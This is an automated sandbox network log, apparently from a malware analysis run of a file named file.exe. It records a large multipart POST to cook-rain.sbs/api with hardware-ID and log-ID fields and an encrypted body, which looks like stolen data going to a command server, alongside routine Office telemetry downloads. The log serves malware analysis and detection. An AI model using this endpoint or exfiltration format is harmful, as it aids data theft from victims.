                                                                                                                                                                                                2024-11-20 09:54:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                76192.168.2.749780188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=B44P2SPY2TE2O2
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 550494
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 2d 2d 42 34 34 50 32 53 50 59 32 54 45 32 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 42 34 34 50 32 53 50 59 32 54 45 32 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 34 34 50 32 53 50 59 32 54 45 32 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 34
                                                                                                                                                                                                Data Ascii: --B44P2SPY2TE2O2Content-Disposition: form-data; name="hwid"32809CE1B9805DCB63CFCF7E6C45F838--B44P2SPY2TE2O2Content-Disposition: form-data; name="pid"1--B44P2SPY2TE2O2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--B4
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 66 c0 c4 74 ef 05 72 94 67 2c d7 01 cc fd 63 e9 08 52 f5 db 1c fc f2 d8 bf 35 96 37 3a 56 ec cb 65 87 a2 c6 7b 2e 80 ec 38 32 0f 56 b7 43 55 4b d2 6a 4c ce 3e c0 80 03 be 5c 61 bf de db d9 4f 6e b4 ef 0f ce 75 56 d4 a9 b4 4c d9 90 af 9f d6 c7 ad 11 63 b1 4a 8d 13 0e c9 ae 17 fb c3 4c 52 d0 d1 c1 57 75 04 5f d5 cb 06 9f 88 d9 ba 9e 9a 26 12 42 91 3e 3f 7a 6f f3 9c 20 f2 b2 4d 52 0c 10 90 41 f0 d3 73 bb 65 06 d4 ae 03 ca 2d e0 81 ae e7 53 67 b8 72 03 d1 56 0d 90 c0 ac b5 0d df e9 f8 50 3b 80 a4 5f 41 b0 31 f2 f4 a4 f5 b2 9b 5f 7e 63 6d 94 5a cf 81 d1 18 d5 1a 31 3b d8 b5 2f cf bb 23 d7 66 21 75 60 a9 37 1d 50 dc ff b5 6d e0 87 46 2d 01 b5 2c b4 96 80 00 be be 31 9c 16 58 e8 73 d6 69 dd ae 4a 13 37 e5 bd 74 ec 63 af 16 f8 14 e0 6a 7a e9 f0 dd 99 f7 47 ad dd
                                                                                                                                                                                                Data Ascii: ftrg,cR57:Ve{.82VCUKjL>\aOnuVLcJLRWu_&B>?zo MRAse-SgrVP;_A1_~cmZ1;/#f!u`7PmF-,1XsiJ7tcjzG
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 77 9a c2 08 7a a2 e4 7b d6 e9 fc 1b 53 25 aa 9f 2e 66 5d b6 0f 3b a5 96 f0 4b cf 3f 71 33 48 3a 44 94 d8 2a 21 5a e6 2f 7c a2 17 78 b8 70 7f bd 77 eb 7a e3 2c 26 37 28 e0 77 11 be cb 2e e9 66 e1 47 78 30 31 d7 eb bf 6f e4 68 20 d6 fd bd f1 97 0d a9 3c 7c f5 70 30 e1 f6 6a 7e fb ee 85 2c 4a ab f0 ad c1 08 2e 3e a7 0e ce 64 ae 15 c0 59 40 d3 d0 d7 b1 e8 c0 c7 cc 71 29 79 7a c3 0b e6 e1 e9 06 43 a6 e9 8e aa 3d 2d 83 6f b3 bf e2 5a 2c 31 e1 10 b1 b4 bf c1 2c 38 f0 6b 76 41 18 49 24 6a 4d 3a fe 37 46 e4 98 8d 7e 93 69 b6 d3 54 e4 5c e1 01 d1 28 85 de 80 f8 97 69 07 36 c6 a3 03 23 22 41 b4 17 1a 43 be 95 4e a4 4b 0f 87 46 f8 79 a1 e4 ff fd 22 4f 70 c7 4d 06 19 cf 49 b5 0a 47 0a b5 ee 15 e5 91 f5 77 04 96 29 16 92 61 a6 07 c5 f2 c8 29 4a 49 ed fb 0a bc 07 77 c3
                                                                                                                                                                                                Data Ascii: wz{S%.f];K?q3H:D*!Z/|xpwz,&7(w.fGx01oh <|p0j~,J.>dY@q)yzC=-oZ,1,8kvAI$jM:7F~iT\(i6#"ACNKFy"OpMIGw)a)JIw
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: d6 ba bf ca b3 1e 3e a5 48 b7 0a c7 2a 4c 70 bc 9b 41 58 15 d9 48 0b 0b b1 dd bc a2 4b 50 52 5f 77 8a 9b 9c 67 75 1e 9e b8 aa 86 0a 38 2b 6e 56 2f e7 0c 04 51 37 ae 13 1f 6b 87 48 ae 15 e6 c7 27 c4 7f 74 28 f5 4b 97 f1 bf ab 81 4b 38 4b c3 84 3a 6a a4 1f da b0 d4 74 28 f8 4a 9d 96 6e f7 5f 24 a3 17 67 67 75 f8 70 ff 32 a1 bd 57 8f 0c cb ab 85 d5 49 6b 28 66 3b 57 af 4a 17 a3 85 23 d4 12 f8 0c 7c 41 dd 38 5e 70 d5 2b 2f 85 13 9f 9d dd 3a 90 c4 8d 7c a5 58 58 84 ac 52 d9 e4 ca 3d fd fc d7 5a 5b 70 11 a5 b6 88 35 5d da e1 98 14 6c c2 b5 3a b9 5e a3 1e 6a 8f 5a 02 eb a9 5c 92 de 8b ab c4 1c 43 a6 10 01 8a 0a f7 b8 75 57 7f 3d e1 d9 70 cc cc b5 f2 90 26 87 73 47 63 2e 82 30 14 63 9b ff b9 c4 2b 90 8f 67 f1 36 82 e4 67 bf b8 a5 5d 38 52 53 15 85 e5 cd 72 82 8f
                                                                                                                                                                                                Data Ascii: >H*LpAXHKPR_wgu8+nV/Q7kH't(KK8K:jt(Jn_$ggup2WIk(f;WJ#|A8^p+/:|XXR=Z[p5]l:^jZ\CuW=p&sGc.0c+g6g]8RSr
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: c9 8f 13 58 99 68 aa 20 56 90 0e 70 a8 4d e4 dd dd 88 2b b8 4a f7 b9 cb 03 37 d9 fc 99 9f 20 0e 06 69 d0 65 7f e8 5f 2a 9d b8 3c 91 7b c7 b5 58 a3 89 fc df 86 ec 97 b4 e4 9f 28 c3 30 83 38 8e 52 a6 da 08 35 ca 39 b7 a9 36 02 02 9c dc d0 26 9e d9 fb 80 74 86 27 a9 6b fb c5 c2 a9 71 d4 1b 67 af 3f 21 d9 7f 89 a3 66 15 72 9c 3e 46 a3 ca 7a a5 6e fb 6d 44 84 fb e0 47 64 3d 09 a4 cc f5 37 ba d2 27 f6 ea bd ca 4c c8 b7 ec 83 91 b8 6c 62 e7 72 34 12 ce b4 cf 65 e5 37 37 71 bc 2a 68 16 0d f4 bc 41 9c 00 82 3c b7 ae f9 dd 65 e8 93 75 6c d5 e7 4f 37 98 22 2f 4c 98 a1 0e cb 6d 09 37 24 95 b8 df 51 8a ff ae eb 21 ba 82 27 77 e1 74 af bf 0a f4 22 4c df 40 68 d6 eb 52 5a 8a 5c 76 60 ef 2a f7 db 17 fc 56 b5 d1 53 cb 99 6a 02 13 40 5a 99 c0 f3 95 5b be 71 ca c9 29 2f 32
                                                                                                                                                                                                Data Ascii: Xh VpM+J7 ie_*<{X(08R596&t'kqg?!fr>FznmDGd=7'Llbr4e77q*hA<eulO7"/Lm7$Q!'wt"L@hRZ\v`*VSj@Z[q)/2
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 29 f2 65 09 17 ba 43 26 db bd 32 28 d1 dc 48 59 46 7e 93 fb 17 bb 6d f3 e8 48 89 c6 32 f7 62 d6 47 8a 3b 6e 5c a7 89 62 07 a5 37 61 5e e1 97 f1 f3 c2 bf 05 da 6f 0a 77 eb ac 0a 6f be 75 4d 08 8c e5 10 5a bc dc ed ec 8c 2f d2 c6 ff ea 37 50 de a6 8c 59 0d a7 eb 30 da 97 34 7f 16 73 be ed 95 1b 9a b6 8b 64 18 50 53 bd 05 7e 24 eb f7 0b 6d 0a 70 1d 9e 3d 4f 8f 56 ec 0f ce c0 e7 55 93 8b 76 7e 33 4d c5 63 3c e4 8b a4 ee 30 0e 35 14 b4 34 37 81 6b 42 f9 29 6a f8 49 dc af e0 36 7d 59 80 c0 35 e2 a4 64 a8 83 f7 c3 17 68 eb 9f 29 2b 56 18 c8 09 58 57 de 1a 25 0f 4b 3b d1 18 dc cd 07 f6 81 0b 1b 43 a7 35 eb 9e 8b 95 97 ed dc 46 03 21 7c b1 ef 4c 91 8b 29 0f e4 e7 16 90 f3 0b 5b fc e7 f5 07 a4 be e9 be cc 4a 0b d9 7f 6f e4 fe 01 99 c5 17 f3 60 f1 ab be 0d 93 2a e7
                                                                                                                                                                                                Data Ascii: )eC&2(HYF~mH2bG;n\b7a^owouMZ/7PY04sdPS~$mp=OVUv~3Mc<0547kB)jI6}Y5dh)+VXW%K;C5F!|L)[Jo`*
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 04 af 01 50 0a 4c b3 08 db 8f b5 19 43 66 6f a3 3e 31 8f 59 04 94 ac 93 dd 08 3a 5f 48 57 c4 d7 ad 46 75 d9 9e d6 ce a1 e7 c4 6a fd 79 8f 57 f9 1f 2c e0 83 72 91 05 0a 91 06 b5 26 ce 99 32 bb 97 6c 71 59 0f 28 25 60 9b c0 c2 73 1f f2 98 98 00 9d 64 6a 42 ae b4 b9 89 55 a9 bc 81 be 6a de ad 0f 99 09 d1 9b 3e fd fa d7 12 5a 77 dd 97 1e 4d 2b 11 7f e6 43 ef 95 5e dd 4e 6f 35 8f 76 cc ab 2c 3e 7f 63 f3 52 d7 5d 28 dd 1f 37 19 8a c0 75 e9 b2 ec ea 8e 55 88 1d d4 8f 51 02 e7 05 56 c4 c0 1e 9e 1f b1 96 0f 53 fa c6 1b 16 25 82 cf 86 6f 1d d1 b5 6a cb 84 35 47 f4 8f 8d 71 0a 41 14 c1 c6 39 ac c4 c1 7e 88 22 aa 72 fe af 52 7a 7d bc f3 1f dd e8 10 a5 55 45 95 ca 28 f8 1c ea c2 e0 4b 33 9b 8c 5a 70 7b 2b 4c ad 1a b0 23 a7 59 d0 72 55 6c 6a e4 47 aa ce ad b8 ca 47 74
                                                                                                                                                                                                Data Ascii: PLCfo>1Y:_HWFujyW,r&2lqY(%`sdjBUj>ZwM+C^No5v,>cR](7uUQVS%oj5GqA9~"rRz}UE(K3Zp{+L#YrUljGGt
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 7d a2 49 04 f5 eb de fd 6a 39 f6 95 25 49 f8 3e 53 c3 e2 9f 77 fb 11 f4 b7 17 44 a3 ef db 6a f2 17 74 be e9 85 e8 79 4a 14 a1 3f 57 c7 0c ed da 2e 36 21 a6 5f a3 5e 0b b0 97 45 21 05 4f a7 20 35 72 c1 80 1e 3f 98 f2 26 52 ba 44 18 21 b9 a1 62 65 5a 67 aa 97 cc 4d fc 91 90 3a ce 0b 8b b5 82 28 7c ac a2 ab 7f 41 94 fe 1d 90 70 29 df f9 62 99 2d 96 f2 41 4f d7 ee 6f 91 f0 a7 ef bb 85 2f d7 56 8a 58 99 ab 81 d3 0e c0 43 89 18 fe 92 97 ee 78 d7 9c 7d fc 70 36 b0 d8 fa 16 75 f5 5f 7f 9f 71 5b e1 f2 9a 87 ec b5 6d 6c 6e f3 75 76 a8 ab 60 eb f2 b6 39 e1 5a ad b9 6b 98 0f 53 01 69 ee 93 ac b7 31 be 36 cd 34 d9 ae bb 58 ef c7 d6 fd f2 b3 8d 97 d7 45 98 57 f4 62 e3 31 6e d5 77 bb 7d 85 36 c5 d8 82 1b 81 16 27 d8 b9 b2 cb 34 8b 7e 64 0b d4 b9 9f 63 85 3b 32 46 84 14
                                                                                                                                                                                                Data Ascii: }Ij9%I>SwDjtyJ?W.6!_^E!O 5r?&RD!beZgM:(|Ap)b-AOo/VXCx}p6u_q[mlnuv`9ZkSi164XEWb1nw}6'4~dc;2F
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 5c 83 77 55 fb b4 b7 77 58 79 89 ad 12 71 27 54 a3 a2 af ec 2e 82 b9 33 35 5e c8 12 8b 01 f5 ad 4b c8 2f 23 d9 5f 55 bf fe 47 07 36 ac df 7c 98 16 05 88 d5 57 1f fa 10 e4 0d 3a a7 09 b8 f1 29 66 cf fb 77 f9 f7 82 f4 ce d7 6a e9 6f 37 2c af f5 7c c2 70 9b 2b 57 2a fb c7 77 5f b6 30 5b c3 cf e2 fc 41 64 f1 c7 82 32 a8 a0 9c 81 65 46 23 0b a0 bf e9 89 5d 00 d5 ea a2 f6 49 1f f6 7f e2 c9 de f2 6d 35 1f ca 6c d1 4d b5 05 b6 38 c3 3e 21 4b 84 dc d4 c0 6b 15 f8 84 04 90 65 6b ae 3b 9a bb 81 d3 86 51 b7 27 17 e8 27 40 77 8b 59 b7 0e 88 a1 e2 41 63 ee 0e 63 ac 09 0a 06 e1 13 38 af 66 4c 18 f3 94 a5 0c a7 e6 f1 17 62 3f 12 42 49 86 4f 64 11 2d 2d a2 2c 6a 6b 30 0b a1 99 3a e0 e4 36 35 77 d7 14 e4 76 5f a4 33 a1 f6 3d e1 ae 54 76 af d0 16 47 ff a1 da df b1 3c 03 91
                                                                                                                                                                                                Data Ascii: \wUwXyq'T.35^K/#_UG6|W:)fwjo7,|p+W*w_0[Ad2eF#]Im5lM8>!Kkek;Q''@wYAcc8fLb?BIOd--,jk0:65wv_3=TvG<
                                                                                                                                                                                                2024-11-20 09:54:28 UTC15331OUTData Raw: 78 b1 a2 8b dd 2d 4a 9f aa 84 11 ec 0c f7 70 9a 8e 13 fa 1a 1e 6d 51 17 c5 89 e0 c7 55 3f 9d 1a 15 19 52 a9 4c 1c 15 25 3f 69 e6 16 ed 57 13 05 d3 aa ae 51 eb ad e7 4c bc 77 55 ca 5a c3 e8 58 7f 93 ba aa 52 b8 ff 57 9b 78 59 cc 55 67 1c 48 af 8f d0 59 38 d1 90 51 0e 69 99 b8 29 8d a2 ce 38 29 54 97 fe ba 5b f8 db ca 82 b2 9d 13 24 28 be e6 b7 fc 6c a8 92 f4 38 8a a5 92 3e a9 08 aa 03 ff 5b 6c 49 9b aa e9 1f 15 b4 7d 6c e7 33 3f 32 56 12 5b c2 fb ac 98 d7 f9 26 a3 3b 39 19 bb 71 65 27 89 ac 65 c1 03 17 41 34 c9 7f 54 2d f0 dd da a0 9b e9 54 84 e9 da ae c0 1f 15 19 54 47 c6 da c1 65 fb d9 88 2f ae c3 8b f6 7c d5 56 52 93 3a 2b 91 ff cb 6a 26 ae 68 f6 46 a9 e0 2b 57 5b 32 6c 99 d6 aa 1c b9 1c 4c e0 b8 e0 a1 2e de 23 2c 8d 96 56 c3 f0 57 63 7b aa f9 e5 3a 86
                                                                                                                                                                                                Data Ascii: x-JpmQU?RL%?iWQLwUZXRWxYUgHY8Qi)8)T[$(l8>[lI}l3?2V[&;9qe'eA4T-TTGe/|VR:+j&hF+W[2lL.#,VWc{:
                                                                                                                                                                                                2024-11-20 09:54:32 UTC992INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=c3ff69ah87ucc24376cs00upcn; expires=Sun, 16-Mar-2025 03:41:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dQJY7SZUeN8TiQj70XTQIaYBTt6v0JAeQ9JVSvZVi5GoywT6KzGN%2FHZ3p3HXB%2BWlK2limPtmfiXbh%2FcsNXbUcLaJCCvf5ijH2ogxuvju3WTjfCphtaRB%2B6EyMa0G%2BaZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578f130dce17e9-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=195&recv=569&lost=0&retrans=0&sent_bytes=2828&recv_bytes=552968&delivery_rate=1902280&cwnd=252&unsent_bytes=0&cid=79807f869ac8ede1&ts=3489&x=0"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                77192.168.2.74977913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:28 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                x-ms-request-id: 5a421824-101e-000b-7f18-3b5e5c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-r1d97b995774n5h6hC1TEBvf8400000008t00000000000rp
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                78192.168.2.74978113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:29 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-r1d97b99577n4dznhC1TEBc1qw00000008mg00000000e54e
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                79192.168.2.74978213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:29 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                x-ms-request-id: 7103f809-c01e-002b-5dee-3a6e00000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-185f5d8b95ckwnflhC1NYCx9qs0000000a60000000003qcw
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                80192.168.2.74978413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:29 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
